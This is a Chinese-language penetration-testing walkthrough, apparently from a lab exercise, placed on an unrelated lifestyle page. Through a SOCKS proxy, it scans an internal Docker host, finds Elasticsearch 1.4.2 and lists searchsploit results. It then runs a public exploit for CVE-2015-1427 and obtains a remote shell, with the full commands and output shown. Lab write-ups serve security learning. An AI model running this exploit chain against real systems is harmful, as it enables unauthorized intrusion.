- 首页 > 生活 > >
- 发现与我们之前的目标容器非常相似,我们可以使用 firefox 设置代理访问
http://172.17.0.1:5000
浏览器代理方法自行百度,重点使用手动配置代理配置 SOCKS 主机
与前面 proxychains.conf 一致 - 访问网页的结果与之前的相同,可以判断
172.17.0.1
便是之前 192.168.56.101
的宿主机
测试探索
172.17.0.2
┌──(kali?kali)-[~/Workspace]└─$ proxychains4 -f ./proxychains.conf nmap -Pn -sT -sV 172.17.0.2130 ?[proxychains] config file found: ./proxychains.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.16Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-19 20:39 CST[proxychains] Strict chain...192.168.56.103:1080...172.17.0.2:1720 <--denied[proxychains] Strict chain...192.168.56.103:1080...172.17.0.2:1025 <--denied......[proxychains] Strict chain...192.168.56.103:1080...172.17.0.2:9200...OK[proxychains] Strict chain...192.168.56.103:1080...172.17.0.2:9200...OKNmap scan report for 172.17.0.2Host is up (0.0066s latency).Not shown: 999 closed tcp ports (conn-refused)PORTSTATE SERVICE VERSION9200/tcp openhttpElasticsearch REST API 1.4.2 (name: Watcher; cluster: elasticsearch; Lucene 4.10.2)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 29.58 seconds
- 发现新线索,
172.17.0.2
的 9200 端口开启,运行服务 Elasticsearch REST API 1.4.2 (name: Watcher; cluster: elasticsearch; Lucene 4.10.2) 说明:Elasticsearch 是位于 Elastic Stack 核心的分布式搜索和分析引擎
- 此处我们可以使用
searchsploit
查询 Elasticsearch 相关漏洞并尝试,攻入其中
──(kali?kali)-[~/Workspace]└─$ searchsploit Elasticse130 ?----------------------------------------------------------------------------------------- ---------------------------------Exploit Title|Path----------------------------------------------------------------------------------------- ---------------------------------ElasticSearch - Remote Code Execution| linux/remote/36337.pyElasticSearch - Remote Code Execution| multiple/webapps/33370.htmlElasticSearch - Search Groovy Sandbox Bypass (Metasploit)| java/remote/36415.rbElasticSearch 1.6.0 - Arbitrary File Download| linux/webapps/38383.pyElasticSearch 7.13.3 - Memory disclosure| multiple/webapps/50149.pyElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal| php/webapps/37054.pyElasticSearch Dynamic Script - Arbitrary Java Execution (Metasploit)| java/remote/33588.rbElasticsearch ECE 7.13.3 - Anonymous Database Dump| multiple/webapps/50152.py----------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results
- 尝试一个
/usr/share/exploitdb/exploits/linux/remote/36337.py
但注意是否安装 python2
以及其 requests
如果没有使用以下代码
sudo apt-get install python2# 安装 python2wget https://bootstrap.pypa.io/pip/2.7/get-pip.py && python2 get-pip.py# 安装 python2 的 pip2 如果有就跳过此步python2 -m pip install requests# 安装 requests 包proxychains4 -f ./proxychains.conf python2 /usr/share/exploitdb/exploits/linux/remote/36337.py 172.17.0.2# 利用 36337.py 脚本
进入其中
──(kali?kali)-[~/Workspace]└─$ proxychains4 -f ./proxychains.conf python2 36337.py 172.17.0.2[proxychains] config file found: ./proxychains.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.16▓███████▓▄▄▄██████ ▄▄▄█████▓ ██▓ ▄████▄████████? ██ ▓███████▓██▓▓█? ▓██??████▄?██? ▓██? ▓?▓██??██? ?█?██? ▓██? ██?▓█? ▓██?▓██??███?██??██?█▄? ▓██▄? ▓██? ???██??▓█▄ ? ▓██▄?██??██??███?██??██??▓█▄ ?██??██▄▄▄▄██?██?? ▓██▓ ? ?██??▓▓▄ ▄██??██??▓█ ?██ ?▓█▄ ?██??██???████??██████?▓█▓██??██████???██? ? ?██?? ▓███? ??██████???▓█??██▓??████??██████??██████??? ?? ?? ??▓???▓?█?? ?▓? ? ?? ???▓? ?? ??? ?▓? ? ? ? ??????? ?? ?? ??▓?? ??▓?? ??? ? ?? ??? ?? ??? ??? ???? ??? ? ? ??? ? ? ??? ? ??? ? ???? ???????? ???????? ??? ?? ?????????? ????????????Exploit for ElasticSearch , CVE-2015-1427Version: 20150309.1{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something~$
经验总结扩展阅读
-
-
-
-
-
-
-
-
天天听健康|40岁女子肝癌入院,不久离世,提醒:1种“粗粮”比烟酒还伤肝,劝你别吃!
-
-
痘痘肌|哪种洗面奶最好用 十款清洁效果好的洗面奶排行
-
|怡红院无奇不有,有人比袭人更嚣张跋扈,有人比晴雯更清高
-
-
-
-
-
-
-
-
-
2022年9月20日投资吉日一览表 2022年9月20日是投资吉日吗